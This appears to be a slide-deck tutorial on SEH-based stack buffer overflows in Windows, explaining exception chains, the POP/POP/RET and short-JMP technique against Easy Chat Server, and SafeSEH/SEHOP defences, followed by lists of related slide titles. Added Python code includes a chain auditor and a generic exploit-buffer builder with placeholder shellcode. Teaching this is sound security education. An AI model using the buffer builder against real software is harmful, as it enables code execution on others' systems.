SEH BASED BUFFER OVERFLOW
What is an Exception
• An exception is an event that occurs during execution and requires
the execution of code outside the normal flow of control (for example
an access violation, a division by zero, or an exception raised by software).
Exception Basics
Diagram: the Operating System delivers the exception to the Process, and the
Process handles it in the __except block, its Exception Handler.
    __try {
        // exception may occur here
        .....
    }
    __except (exception filter) {
        // this handles the exception
        ..... printf("exception");
    }
How does the OS locate the handlers?
Diagram: Process -> Thread Information Block -> Exception Registration.
Each Exception Registration Record is 8 bytes:
    Pointer to Next Record    (4 bytes)
    Pointer to Handler        (4 bytes)
FS:[0] in the Thread Information Block holds the address of the first record.
Complicated Program with SEH
    main()
    {
        functionA();
    }
    functionA()
    {
        __try {
            functionB();
        } __except (.....) {
            .....
        }
    }
    functionB()
    {
        __try {
            functionC();
        } __except (.....) {
            .....
        }
    }
    functionC()
    {
        __try {
            printf("SEH Demo");
        } __except (.....) {
            .....
        }
    }
Exception Registration Linked List
The chain grows as the __try blocks of the program above are entered and
shrinks again as they are left. FS:[0] in the Thread Information Block always
points at the newest record; the oldest record belongs to the OS default
handler and its Next pointer is 0xFFFFFFFF, which terminates the chain.

Before functionA's __try is entered:
    FS:[0] -> Record 1 [Next = 0xFFFFFFFF | OS Handler]

Inside functionA's __try (functionB has been called, its __try not yet entered):
    FS:[0] -> Record 2 [Ptr to Record 1 | FunctionA Handler]
           -> Record 1 [0xFFFFFFFF      | OS Handler]

Inside functionB's __try:
    FS:[0] -> Record 3 [Ptr to Record 2 | FunctionB Handler]
           -> Record 2 [Ptr to Record 1 | FunctionA Handler]
           -> Record 1 [0xFFFFFFFF      | OS Handler]

Inside functionC's __try, while printf("SEH Demo") runs:
    FS:[0] -> Record 4 [Ptr to Record 3 | FunctionC Handler]
           -> Record 3 [Ptr to Record 2 | FunctionB Handler]
           -> Record 2 [Ptr to Record 1 | FunctionA Handler]
           -> Record 1 [0xFFFFFFFF      | OS Handler]

Each record lives in the stack frame of the function that registered it, so
newer records sit at lower stack addresses than older ones.
Program without SEH
    main()
    {
        functionA();
    }
    functionA()
    {
        functionB();
    }
    functionB()
    {
        functionC();
    }
    functionC()
    {
        printf("SEH Demo");
    }
Program Stack without SEH
(top of stack, lower memory addresses; unused stack lies below ESP)
    funcC's stack frame:    funcC local variables            <- ESP
                            funcB's EBP                      <- EBP
                            return address in funcB
                            funcC argument 1
                            funcC argument 2
    funcB's stack frame:    funcB local variables
                            funcA's EBP
                            return address in funcA
                            funcB argument 1
                            funcB argument 2
    funcA's stack frame:    funcA local variables
                            caller's EBP
                            return address in caller
                            funcA argument 1
                            funcA argument 2
(bottom of stack, higher memory addresses)
Program with SEH
(the same main / functionA / functionB / functionC code as in "Complicated
Program with SEH" above: each call is wrapped in a __try / __except block)
Program Stack with SEH
(top of stack, lower memory addresses; unused stack lies below ESP)
    funcC's stack frame:    funcC local variables                 <- ESP
      funcC's Exception     Next Exception_Registration_Record
      Registration Record   funcC Exception Handler
                            funcB's EBP                           <- EBP
                            return address in funcB
                            funcC argument 1
                            funcC argument 2
    funcB's stack frame:    funcB local variables
      funcB's Exception     Next Exception_Registration_Record
      Registration Record   funcB Exception Handler
                            funcA's EBP
                            return address in funcA
                            funcB argument 1
                            funcB argument 2
    funcA's stack frame:    funcA local variables
      funcA's Exception     Next Exception_Registration_Record
      Registration Record   funcA Exception Handler
                            caller's EBP
                            return address in caller
                            funcA argument 1
                            funcA argument 2
(bottom of stack, higher memory addresses)

In this layout each function's 8-byte Exception Registration Record sits
between its local variables and its saved EBP. A local buffer that overflows
towards higher addresses therefore overwrites the function's own record
(Next pointer, then handler pointer) before it reaches the saved EBP and the
return address.
Quick Recap of Concepts
• SEH consists of a chain of Exception Registration Records
• These records are dynamically added to and removed from a linked list as
__try blocks are entered and left
• FS:[0] points to the start of the SEH chain
• When an exception happens the OS walks the SEH chain to find a handler
that accepts the exception
• If a handler accepts it, it handles the exception; otherwise the default
OS handler kicks in
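The walk the recap describes can be reproduced offline. The following is an added example, not code from the slides: it models a 32-bit stack as a constructed byte image, follows the 8-byte records from FS:[0] exactly as the dispatcher does (Next pointer, then handler pointer, until the 0xFFFFFFFF terminator), and then audits the chain the way one would with WinDbg's `!exchain` or mona's `!mona seh`. All addresses, module ranges and the stack contents are made up for the example; the second run shows what the chain looks like after a local buffer in funcC has overwritten its own record with "AAAA".

```python
import struct

END_OF_CHAIN = 0xFFFFFFFF   # Next pointer of the last record (OS default handler)


class Memory:
    """Flat 32-bit memory model over constructed regions {base: bytearray};
    a stand-in for a live process, not real memory."""

    def __init__(self, regions):
        self.regions = dict(regions)

    def read_u32(self, addr):
        for base, data in self.regions.items():
            if base <= addr and addr + 4 <= base + len(data):
                return struct.unpack_from("<I", data, addr - base)[0]
        raise ValueError("unmapped address 0x%08x" % addr)


def walk_seh_chain(mem, fs0, max_records=64):
    """Follow the Exception Registration Records from FS:[0], like WinDbg's
    !exchain. Returns [(record_addr, next_ptr, handler)]; next/handler are
    None when the record itself cannot be read (dangling Next pointer)."""
    chain, cur, seen = [], fs0, set()
    while cur != END_OF_CHAIN and len(chain) < max_records:
        if cur in seen:
            raise RuntimeError("SEH chain loops back to 0x%08x" % cur)
        seen.add(cur)
        try:
            nxt, handler = mem.read_u32(cur), mem.read_u32(cur + 4)
        except ValueError:
            chain.append((cur, None, None))
            break
        chain.append((cur, nxt, handler))
        cur = nxt
    return chain


def audit_chain(chain, stack_lo, stack_hi, modules):
    """Flag records that look overwritten: a Next pointer that is neither a
    stack address nor the terminator, or a handler outside every module."""
    def in_module(addr):
        return any(m["base"] <= addr < m["base"] + m["size"] for m in modules)

    findings = []
    for rec, nxt, handler in chain:
        if nxt is None:
            findings.append("record 0x%08x is unreadable (dangling Next)" % rec)
            continue
        if nxt != END_OF_CHAIN and not stack_lo <= nxt < stack_hi:
            findings.append("record 0x%08x: Next 0x%08x is not on the stack" % (rec, nxt))
        if not in_module(handler):
            findings.append("record 0x%08x: handler 0x%08x is in no module" % (rec, handler))
    return findings


def build_stack(base, size, records):
    """Constructed stack image; records is {record_addr: (next, handler)}."""
    img = bytearray(size)
    for addr, (nxt, handler) in records.items():
        struct.pack_into("<II", img, addr - base, nxt, handler)
    return img


# Constructed sample: every address below is made up for the example.
STACK_BASE, STACK_SIZE = 0x0012FF00, 0x100
FS0 = 0x0012FF40                                   # funcC's record, the newest
MODULES = [{"name": "demo.exe", "base": 0x00400000, "size": 0x10000},
           {"name": "ntdll.dll", "base": 0x7C900000, "size": 0xB0000}]
CLEAN_RECORDS = {
    0x0012FF40: (0x0012FF80, 0x00401500),          # funcC handler
    0x0012FF80: (0x0012FFB0, 0x00401300),          # funcB handler
    0x0012FFB0: (END_OF_CHAIN, 0x7C9032A8),        # OS default handler
}


def demo(overflow=False):
    """Walk and audit the chain; with overflow=True a local buffer in funcC
    has run over its own record with 0x41414141 ("AAAA")."""
    records = dict(CLEAN_RECORDS)
    if overflow:
        records[FS0] = (0x41414141, 0x41414141)
    mem = Memory({STACK_BASE: build_stack(STACK_BASE, STACK_SIZE, records)})
    chain = walk_seh_chain(mem, FS0)
    return chain, audit_chain(chain, STACK_BASE, STACK_BASE + STACK_SIZE, MODULES)


if __name__ == "__main__":
    for flag in (False, True):
        chain, findings = demo(flag)
        print("overflow=%s" % flag)
        for rec, nxt, handler in chain:
            print("  0x%08x  next=%s  handler=%s" % (rec, nxt, handler))
        for f in findings:
            print("  !", f)
```

The clean run reports three records and no findings; the overflowed run shows funcC's record pointing at 0x41414141 for both fields, a second "record" that cannot be read, and three findings. That is the same picture a debugger gives right after the crash, before the dispatcher has called the corrupted handler.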
Who walks the SEH chain? The Exception Dispatcher
    KiUserExceptionDispatcher()
      RtlDispatchException()
        RtlExecuteHandlerForException()
          ExecuteHandler()
            _except_handler()          <- the handler address stored in the record
_except_handler3() in turn calls our handler:
    _except_handler3()
    {
        Scopetable filter-expression()
        _global_unwind2()
        RtlUnwind()
        RtlExecuteHandlerForUnwind()
        Scopetable __except block()
    }
Example that raises an access violation inside a __try block:
    __try {
        int *p = 0x00000000;
        *p = 10;
    } __except (filter(.......)) {
        ..... printf("exception");
    }
Handler Prototype
• The prototype for the exception handler is as follows (excpt.h):
    EXCEPTION_DISPOSITION __cdecl
    _except_handler(
        struct _EXCEPTION_RECORD *ExceptionRecord,
        void                     *EstablisherFrame,
        struct _CONTEXT          *ContextRecord,
        void                     *DispatcherContext
    );
• EstablisherFrame is the address of the Exception Registration Record
itself, i.e. the address of its "Next ERR" field on the program stack.
Analyzing the 2 Stack Frames
When the dispatcher calls the handler, two stacks matter. Low memory is at
the top of both diagrams.

Program Stack (funcC's frame):
    Local Variable
    Next ERR                  <- FS:[0], also the EstablisherFrame argument
    ExceptionHandler()
    Func-B EBP
    RET of Func-B
    Func-C Arg 1
    Func-C Arg 2

Exception Dispatcher Stack, at the moment ExceptionHandler() is entered
(EIP is at its first instruction):
    ESP      -> return address into the dispatcher
    ESP+4    -> ExceptionRecord
    ESP+8    -> EstablisherFrame = address of the "Next ERR" field above
    ESP+12   -> ContextRecord
    ESP+16   -> DispatcherContext

What if? Suppose ExceptionHandler() consists of the three instructions
    pop eax
    pop ebx
    retn

Pop EAX:  ESP moves up 4 bytes; the dispatcher return address goes into EAX.
Pop EBX:  ESP moves up another 4 bytes; the ExceptionRecord pointer goes into EBX.
RETN:     ESP now points at EstablisherFrame, so RETN loads EIP with the
          address of the "Next ERR" field on the program stack.

Result: the CPU starts executing whatever 4 bytes are stored in the
"Next ERR" field of the record that was just "handled". The values left in
EAX and EBX are irrelevant; POP/POP/RET is only used to move ESP by 8.
Demo of overwrite with AAAAA....
• Verify that the POP/POP/RET instruction sequence sends control to the
next ERR location
• Cause a buffer overflow in the Easy Chat Server program by sending a
large number of A's (0x41)
Program Stack before the overwrite (low memory at the top):
    Local Variable
    Next ERR                  <- FS:[0]
    ExceptionHandler()
    Func-B EBP
    RET of Func-B
    Func-C Arg 1
    Func-C Arg 2
How do we exploit this condition?
Program Stack after the overwrite (low memory at the top):
    AAAA....                  the local buffer, filled with A's
    Short JMP 6 bytes         overwrites "Next ERR": \xEB\x06 followed by two NOPs
    ExceptionHandler()        overwritten with the address of a POP/POP/RET sequence
    NOP sled
    Payload
    Payload
    Payload
FS:[0] still points at the (now overwritten) "Next ERR" field.

Flow: the overflow corrupts the frame and an exception is raised; the
dispatcher calls the overwritten handler, i.e. POP/POP/RET, with
EstablisherFrame at ESP+8; RETN loads EIP with the address of the "Next ERR"
field; the short JMP stored there jumps 6 bytes forward, over its own two
NOPs and the 4-byte handler pointer, into the NOP sled and then the payload.

Buffer layout after the A's (low memory on the left):
    Short JMP 6 bytes | 2 NOP   | Ptr to EH (POP/POP/RET) | NOP Sled        | Payload
    2 bytes           | 2 bytes | 4 bytes                 | variable length | variable length
Let's exploit Easy Chat Server
• Steps:
• Find the exact offset of Next ERR and ExceptionHandler() on the stack
• Find a POP/POP/RET sequence in a module without SAFESEH
• Overwrite ExceptionHandler() with the address of the POP/POP/RET
• Overwrite Next ERR with a short JMP of 6 bytes => "\xEB\x06\x90\x90"
• Add the payload 6 bytes after the start of Next ERR, i.e. immediately
after the 4-byte ExceptionHandler() pointer
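The five steps above are what an exploit script automates. The following is an added example, not the slides' own exploit and not tied to Easy Chat Server: it finds the handler offset from a cyclic pattern the way `pattern_create` / `pattern_offset` do, assembles the buffer in the layout shown above (junk, "\xEB\x06\x90\x90", POP/POP/RET address, NOP sled, payload), refuses bad characters, and decodes the short jump to confirm it lands on the NOP sled. The crash value, the POP/POP/RET address 0x10022A71 and the INT3 placeholder "shellcode" are all constructed for the example; against a real target they come from the debugger and from a module without SafeSEH.

```python
import struct

SHORT_JMP_OVER_HANDLER = b"\xEB\x06\x90\x90"   # jmp short +6, then two NOPs of padding


def pattern_create(length):
    """Metasploit-style cyclic pattern Aa0Aa1Aa2...: a 4-byte value read from a
    crash maps back to a single offset (see pattern_offset)."""
    out = bytearray()
    for u in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for l in "abcdefghijklmnopqrstuvwxyz":
            for d in "0123456789":
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern, value):
    """Offset of the bytes a field was overwritten with; value is the int the
    debugger showed (little-endian) or the raw 4 bytes."""
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    return pattern.find(needle)


def build_seh_payload(nseh_offset, ppr_addr, shellcode, total_len, bad_chars=b"\x00"):
    """junk | nSEH: jmp short +6 + 2 NOPs | SEH: pop/pop/ret | NOP sled | shellcode"""
    buf = b"A" * nseh_offset + SHORT_JMP_OVER_HANDLER + struct.pack("<I", ppr_addr)
    sled_len = total_len - len(buf) - len(shellcode)
    if sled_len < 0:
        raise ValueError("shellcode of %d bytes does not fit" % len(shellcode))
    buf += b"\x90" * sled_len + shellcode
    bad = sorted(hex(c) for c in set(buf[nseh_offset:]) if c in bad_chars)
    if bad:
        raise ValueError("bad characters after nSEH: %s" % ", ".join(bad))
    return buf


def short_jmp_target(buf, nseh_offset):
    """Decode the short jmp stored in nSEH the way the CPU does once pop/pop/ret
    has returned into it: target = next instruction (offset + 2) + signed rel8."""
    opcode, rel8 = buf[nseh_offset], buf[nseh_offset + 1]
    if opcode != 0xEB:
        raise ValueError("nSEH does not start with a short jmp")
    rel = rel8 - 256 if rel8 > 127 else rel8
    return nseh_offset + 2 + rel


def demo():
    """Constructed end-to-end run: find the offset from a crash, then build."""
    pattern = pattern_create(2000)
    # Constructed: the debugger showed the SE handler overwritten with these
    # pattern bytes after the crash (read back from the pattern here).
    crashed_handler = pattern[220:224]
    seh_offset = pattern_offset(pattern, crashed_handler)
    nseh_offset = seh_offset - 4                 # Next ERR sits 4 bytes before the handler
    ppr_addr = 0x10022A71                        # hypothetical pop/pop/ret, no null bytes
    shellcode = b"\xCC" * 32                     # constructed stand-in: INT3 breakpoints
    buf = build_seh_payload(nseh_offset, ppr_addr, shellcode, total_len=2000)
    return nseh_offset, buf


if __name__ == "__main__":
    nseh, buf = demo()
    print("nSEH at %d, SEH at %d, short jmp lands at %d (start of NOP sled)" %
          (nseh, nseh + 4, short_jmp_target(buf, nseh)))
```

Two details worth noticing: the jump distance is 6 because the two padding NOPs and the 4-byte handler pointer together occupy the 6 bytes between the end of the `jmp` instruction and the sled, and the bad-character check is what forces the choice of a POP/POP/RET address without null bytes (a typical image base such as 0x00400000 would fail it).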
SEH Exploitation Protection
• Modules linked with /SAFESEH cannot be used as the source of POP/POP/RET
• /SAFESEH makes the linker record a list of "safe" exception handlers in
the module's Load Configuration directory
• Before executing a handler, the OS matches the handler address against
this list
• Only if there is a match does the handler execute; otherwise the handler
is rejected and the process is terminated
• Microsoft introduced this to protect SEH from exploitation; the OS-side
check is applied from Windows XP SP2 / Windows Server 2003 onwards
• Caveats for the technique above: it still needs a loaded module without a
handler list (in Immunity Debugger, !mona modules shows the SafeSEH status
of every module); the NOP sled and payload run from the stack, so the
process must not have DEP enforced; and SEHOP (Vista SP1 / Server 2008
onwards) additionally walks the chain before dispatch and rejects it if the
overwritten Next pointer no longer leads to the final OS handler
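The decision the OS makes with the handler list can be written down as a small model. The following is an added example, not the slides' code and not ntdll's actual routine: it takes a constructed table of loaded modules (made-up names, bases, and registered-handler RVAs, the information `!mona modules` prints for a real process), applies the rule above, and uses it to filter POP/POP/RET candidates the way an exploit writer must. The handling of addresses outside every module is deliberately simplified to a DEP on/off switch.

```python
IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400   # image declares it has no handlers at all

# Constructed module table (made-up names, bases and RVAs). In practice the
# values come from each module's Load Configuration directory.
MODULES = [
    {"name": "ntdll.dll",  "base": 0x7C900000, "size": 0xB0000,
     "safeseh": {0x0001F2A0, 0x000332A8, 0x00041B10}, "dllchars": 0},
    {"name": "noseh.dll",  "base": 0x20000000, "size": 0x10000,
     "safeseh": None, "dllchars": IMAGE_DLLCHARACTERISTICS_NO_SEH},
    {"name": "vuln.exe",   "base": 0x00400000, "size": 0x10000,
     "safeseh": None, "dllchars": 0},
    {"name": "helper.dll", "base": 0x10000000, "size": 0x40000,
     "safeseh": None, "dllchars": 0},
]


def module_for(addr, modules):
    """Module whose mapped range contains addr, or None (e.g. a stack address)."""
    for m in modules:
        if m["base"] <= addr < m["base"] + m["size"]:
            return m
    return None


def rtl_is_valid_handler(handler, modules, dep_enabled=False):
    """Model of the check the dispatcher runs before calling a handler.
    Returns (accepted, reason). Simplification: the real ntdll routine has
    more branches for addresses outside any image; here that case is
    reduced to 'accepted only while DEP is off'."""
    m = module_for(handler, modules)
    if m is None:
        if dep_enabled:
            return False, "0x%08x is outside every module and DEP is on" % handler
        return True, "0x%08x is outside every module; DEP is off" % handler
    if m["dllchars"] & IMAGE_DLLCHARACTERISTICS_NO_SEH:
        return False, "%s is marked NO_SEH; no handler may live in it" % m["name"]
    if m["safeseh"] is not None:
        if handler - m["base"] in m["safeseh"]:
            return True, "0x%08x is a registered handler of %s" % (handler, m["name"])
        return False, "0x%08x is in %s but not in its SafeSEH table" % (handler, m["name"])
    return True, "%s has no SafeSEH table; any address in it is accepted" % m["name"]


def usable_ppr_addresses(candidates, modules, bad_chars=b"\x00"):
    """Filter pop/pop/ret candidates: must sit in a module (stable address),
    pass the handler check, and contain no bad characters."""
    usable = []
    for addr in candidates:
        if module_for(addr, modules) is None:
            continue
        accepted, _ = rtl_is_valid_handler(addr, modules)
        if not accepted:
            continue
        if any(b in bad_chars for b in addr.to_bytes(4, "little")):
            continue
        usable.append(addr)
    return usable


if __name__ == "__main__":
    candidates = [0x7C90ABCD, 0x20001000, 0x00401123, 0x10022A71, 0x0012FF44]
    for addr in candidates:
        print("0x%08x -> %s" % (addr, rtl_is_valid_handler(addr, MODULES)[1]))
    print("usable:", ["0x%08x" % a for a in usable_ppr_addresses(candidates, MODULES)])
```

Of the five constructed candidates only 0x10022A71 survives: the ntdll address is not in ntdll's handler list, noseh.dll is flagged as having no handlers, the vuln.exe address contains a null byte, and the stack address is not inside any module. This is exactly the filtering a module list with SafeSEH status lets you do before searching a module for POP/POP/RET.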
ABUSING SEH
An access violation / exception is triggered.
Stack after the overwrite (low memory at the top):
    Pointer to Next SEH record    (overwritten with a jmp to the shellcode)
    Current SE Handler            (overwritten with the address of pop,pop,ret)
    .....
    Shellcode
(1) The exception handler kicks in.
(2) The Current SE Handler was overwritten and points to pop,pop,ret.
(3) When the dispatcher calls the exception handler, the address of the
"pointer to next SEH" field is passed as the EstablisherFrame argument and
therefore sits on the stack at ESP+8. pop,pop,ret puts this address in EIP
and so executes the bytes stored in the "pointer to next SEH" field.
(4) The pointer to next SEH was overwritten with a jmp to the shellcode.
More Related Content

What's hot

台科逆向簡報
台科逆向簡報台科逆向簡報
台科逆向簡報
耀德 蔡
 
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
Pixie Labs
 
CyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation ProcessCyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation Process
Thomas Gregory
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
Alexandre Moneger
 
20190521 pwn 101_by_roy
20190521 pwn 101_by_roy20190521 pwn 101_by_roy
20190521 pwn 101_by_roy
Roy
 
Exploit Development: EzServer Buffer Overflow oleh Tom Gregory
Exploit Development: EzServer Buffer Overflow oleh Tom GregoryExploit Development: EzServer Buffer Overflow oleh Tom Gregory
Exploit Development: EzServer Buffer Overflow oleh Tom Gregory
zakiakhmad
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodesAmr Ali
 
Rust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command LineRust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command Line
Matt Provost
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassembling
Harsh Daftary
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyFinding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated Disassembly
Priyanka Aash
 
Verilog Lecture3 hust 2014
Verilog Lecture3 hust 2014Verilog Lecture3 hust 2014
Verilog Lecture3 hust 2014
Béo Tú
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadache
camsec
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
 
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
The Linux Foundation
 
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsTDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
Sheng-Hao Ma
 
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
RootedCON
 
Mona cheatsheet
Mona cheatsheetMona cheatsheet
Mona cheatsheet
Ce.Se.N.A. Security
 
Exploiting 101
Exploiting 101Exploiting 101
Exploiting 101
Ackcent
 

What's hot (20)

台科逆向簡報
台科逆向簡報台科逆向簡報
台科逆向簡報
 
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
No instrumentation Golang Logging with eBPF (GoSF talk 11/11/20)
 
CyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation ProcessCyberLink LabelPrint 2.5 Exploitation Process
CyberLink LabelPrint 2.5 Exploitation Process
 
02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack02 - Introduction to the cdecl ABI and the x86 stack
02 - Introduction to the cdecl ABI and the x86 stack
 
17
1717
17
 
20190521 pwn 101_by_roy
20190521 pwn 101_by_roy20190521 pwn 101_by_roy
20190521 pwn 101_by_roy
 
Exploit Development: EzServer Buffer Overflow oleh Tom Gregory
Exploit Development: EzServer Buffer Overflow oleh Tom GregoryExploit Development: EzServer Buffer Overflow oleh Tom Gregory
Exploit Development: EzServer Buffer Overflow oleh Tom Gregory
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodes
 
Rust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command LineRust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command Line
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassembling
 
Controlfile
ControlfileControlfile
Controlfile
 
Finding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated DisassemblyFinding Xori: Malware Analysis Triage with Automated Disassembly
Finding Xori: Malware Analysis Triage with Automated Disassembly
 
Verilog Lecture3 hust 2014
Verilog Lecture3 hust 2014Verilog Lecture3 hust 2014
Verilog Lecture3 hust 2014
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadache
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
 
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
XPDDS17: Using American Fuzzy Lop on the x86 Instruction Emulator - George Du...
 
TDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on WindowsTDOH 南區 WorkShop 2016 Reversing on Windows
TDOH 南區 WorkShop 2016 Reversing on Windows
 
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
Ilfak Guilfanov - Decompiler internals: Microcode [rooted2018]
 
Mona cheatsheet
Mona cheatsheetMona cheatsheet
Mona cheatsheet
 
Exploiting 101
Exploiting 101Exploiting 101
Exploiting 101
 

Similar to Seh based attack

Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick review
Ce.Se.N.A. Security
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploitshughpearse
 
Exploitation Crash Course
Exploitation Crash CourseExploitation Crash Course
Exploitation Crash Course
UTD Computer Security Group
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
Japneet Singh
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
Sam Bowne
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit development
Payampardaz
 
Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
X86 assembly & GDB
X86 assembly & GDBX86 assembly & GDB
X86 assembly & GDB
Jian-Yu Li
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
amiable_indian
 
CNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in LinuxCNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in Linux
Sam Bowne
 
Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545
Kernel TLV
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
Sam Bowne
 
CNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on LinuxCNIT 127: Ch 2: Stack overflows on Linux
CNIT 127: Ch 2: Stack overflows on Linux
Sam Bowne
 
Coal (1)
Coal (1)Coal (1)
Coal (1)
talhashahid40
 
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh SharmaBuffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
n|u - The Open Security Community
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Elvin Gentiles
 
Buffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredBuffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly Required
Kory Kyzar
 
SEMAPHORE MANAGEMENT AND TYPES OF SEMAPHORE .pptx
SEMAPHORE MANAGEMENT AND TYPES OF SEMAPHORE .pptxSEMAPHORE MANAGEMENT AND TYPES OF SEMAPHORE .pptx
SEMAPHORE MANAGEMENT AND TYPES OF SEMAPHORE .pptx
SaiDhanushM
 
Reversing malware analysis training part4 assembly programming basics
Reversing malware analysis training part4 assembly programming basicsReversing malware analysis training part4 assembly programming basics
Reversing malware analysis training part4 assembly programming basics
Cysinfo Cyber Security Community
 

Similar to Seh based attack (20)

Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick review
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
 
Exploitation Crash Course
Exploitation Crash CourseExploitation Crash Course
Exploitation Crash Course
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit development
 
Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacks
 
X86 assembly & GDB
X86 assembly & GDBX86 assembly & GDB
X86 assembly & GDB
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
CNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in LinuxCNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in Linux
 
Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
 
CNIT 127: Ch 2: Stack overflows on Linux
